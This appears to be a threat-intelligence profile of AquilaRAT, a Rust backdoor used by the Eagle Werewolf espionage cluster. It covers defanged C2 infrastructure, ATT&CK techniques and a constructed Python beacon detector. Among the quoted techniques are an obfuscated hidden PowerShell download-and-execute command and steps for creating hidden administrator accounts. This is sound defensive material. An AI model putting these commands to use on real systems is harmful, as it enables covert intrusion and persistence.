AquilaRAT
AquilaRAT is a previously undocumented Rust-based remote access trojan/backdoor associated with the Eagle Werewolf cluster. It was observed in espionage-focused campaigns active since at least May 2023 and linked to activity detected in February 2026. Eagle Werewolf primarily targeted state/government organizations, industrial companies, and individuals involved in UAV/drone manufacturing and engineering, using Starlink registration and drone-themed lures distributed via phishing and compromised Telegram channels.
In the described intrusion chain, a Rust dropper disguised as a Starlink activation/checklist application decrypted and launched a Go dropper. The Go dropper unpacked components, created hidden local user accounts, attempted to add them to the Administrators group, prepared SSH tunnel configuration, and installed AquilaRAT as a Windows service named MicrosoftOfficeUpdate, using the binary MicrosoftOfficeUpdate.exe.
AquilaRAT communicates with infrastructure including updateserv[.]net and retrieves additional C2 addresses from servupdate[.]net/array/array9.json; configurationserv[.]com is also mentioned in related infrastructure. It generates a machine identifier from host hardware and system attributes, including computer name, BIOS serial number, system UUID, processor ID, and motherboard serial number, registers the victim with a /check endpoint, and polls /backup/get-time every 15 seconds. Reported tasking includes heartbeat/beaconing, command execution, file upload, and file scanning. The Cmd task executes PowerShell commands and uploads results to /cmd/upload-result. The Files task uploads files to the C2 in 5 MB chunks via /file/uploadChunk. The ScanFiles task enumerates files according to extensions, ignored substrings, and recursion depth, then sends metadata to /clients/files.
The malware was deployed alongside Go2Tunnel to support reverse SSH tunneling, providing the operators with persistent remote access in addition to AquilaRAT’s RAT functionality.
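As an added example (not code from the original reporting or from the Mallory page), the following Python detector looks for the C2 pattern described above in proxy logs: a regular ~15 s poll cadence to /backup/get-time, and a /check registration followed by task-result paths such as /cmd/upload-result. The log format and host names are constructed; the destination domain is the defanged value from the reporting.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

POLL_PATH, REGISTER_PATH = "/backup/get-time", "/check"  # paths named in public reporting
TASK_PATHS = {"/cmd/upload-result", "/file/uploadChunk", "/clients/files"}
PROTOCOL_PATHS = TASK_PATHS | {POLL_PATH, REGISTER_PATH}
POLL_INTERVAL = 15.0  # seconds, per the reporting

# Constructed proxy log, "timestamp src_host dst_host path"; not real telemetry.
SAMPLE_LOG = """\
2026-02-10T09:00:00 ws-17 updateserv[.]net /check
2026-02-10T09:00:15 ws-17 updateserv[.]net /backup/get-time
2026-02-10T09:00:30 ws-17 updateserv[.]net /backup/get-time
2026-02-10T09:00:45 ws-17 updateserv[.]net /backup/get-time
2026-02-10T09:01:00 ws-17 updateserv[.]net /backup/get-time
2026-02-10T09:01:03 ws-17 updateserv[.]net /cmd/upload-result
2026-02-10T09:00:02 ws-22 intranet.example /backup/get-time
2026-02-10T09:07:40 ws-22 intranet.example /backup/get-time
2026-02-10T09:03:00 ws-31 updates.example /check
"""

def parse(log):
    # Parse the constructed 4-field lines into (ts, src, dst, path); skip malformed ones.
    events = []
    for line in log.splitlines():
        f = line.split()
        if len(f) == 4:
            events.append((datetime.fromisoformat(f[0]), f[1], f[2], f[3]))
    return events

def find_beacons(events, min_polls=4, jitter=2.0):
    """Flag hosts on a regular ~15 s poll cadence or on 2+ distinct protocol paths."""
    by_src = defaultdict(list)
    for ts, src, _dst, path in events:
        if path in PROTOCOL_PATHS:
            by_src[src].append((ts, path))
    hits = {}
    for src, evs in by_src.items():
        reasons = []
        polls = sorted(ts for ts, p in evs if p == POLL_PATH)
        if len(polls) >= min_polls:  # mean near 15 s with little spread = machine-driven polling
            gaps = [(b - a).total_seconds() for a, b in zip(polls, polls[1:])]
            if abs(mean(gaps) - POLL_INTERVAL) <= jitter and pstdev(gaps) <= jitter:
                reasons.append(f"{len(polls)} polls to {POLL_PATH} every ~{mean(gaps):.0f}s")
        seen = {p for _, p in evs}
        if len(seen) >= 2:  # e.g. /check registration followed by a task result upload
            reasons.append("multiple protocol paths: " + ", ".join(sorted(seen)))
        if reasons:
            hits[src] = reasons
    return hits
```

The jitter tolerance is a constructed tuning knob; in production, pair the path match with the defanged domains above rather than relying on paths alone, since /check is a common URI.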
Groups observed using it
1 distinct threat actor attributed by public researchers.
MicrosoftOfficeUpdate.exe is a previously undocumented Rust RAT, which we named AquilaRAT.
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
A separate espionage campaign linked to the Eagle Werewolf cluster used Iraqi hosting on Regxa infrastructure to deploy multiple remote access tools via phishing lures based on Starlink registration and drone training themes.
Notably, in February 2026, it compromised one of the drone-focused Telegram channels to distribute malware.
Execution
4 techniques
run-script.ps1, a PowerShell script to load and execute code via PowerShell. The file contains: powershell -w hidden -ep bypass -c "I''E''X...DOWNLOADDaTa(...)"
Cmd, performs the following actions: cmd /K chcp 65001 —sets the encoding chcp-65001, and then executes powershell <command>.
Upon execution, StarDebug_1.0.1.msi creates the directory %LOCALAPPDATA%\Star and extracts the following three files to it...
The URL hxxps://battleflight[.]org/download/installer hosted the executable BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
Persistence
2 techniques
inst_u.ps1 ... checks whether the account $sshUserName exists and creates it if necessary... It then attempts to add the new account to the built-in "Administrators" group.
Privilege Escalation
1 technique
Stealth
6 techniques
The appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer.
The dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
At the final stage of execution, the Rust dropper deletes the insider-[a-zA-Z0-9]{6} directory.
the C# dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
the script adds a registry setting to hide the new account from the logon screen... UserList ... -Name $sshUserName -Value 0
Discovery
2 techniques
EchoGather performs anti-virtualization checks, gathers system information, uploads it to the C2 server...
ScanFiles ... The following fields are sent to the endpoint /clients/files: fileName relativePath fullPath fileSize createdDate modifiedDate
Collection
2 techniques
Files, uploads a directory/file from the host to the C2 server.
The updater.exe executable is a Go dropper that unpacks embedded gzip archives and launches final stage loaders.
Command and Control
3 techniques
The C2 server is queried every 15 seconds.
The loader then fetches the Node.js interpreter (if it is not present in the system) and the next stage obfuscated JS script.
Exfiltration
1 technique
The payload then enters an endless loop in which it connects to the C2 server, encodes the system information in Base64, and exfiltrates it via an HTTPS POST query.
IOCs tracked for this family
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Rust-based backdoor used in the Eagle Werewolf campaign with rotating command-and-control domains.
Rust-based backdoor/RAT used in the campaign with multiple rotating C2 domains.
A previously undocumented Rust RAT used by Eagle Werewolf. It generates a machine ID from host hardware identifiers, retrieves additional C2 addresses, registers with the server, polls every 15 seconds, and executes JSON-defined tasks including heartbeat, file upload, command execution, and file scanning.
A previously undocumented Rust RAT installed as a service masquerading as Microsoft Office Update. It generates a machine ID, retrieves additional C2s, registers with the server, polls for JSON-formatted tasks, executes commands, scans files, and uploads data in chunks.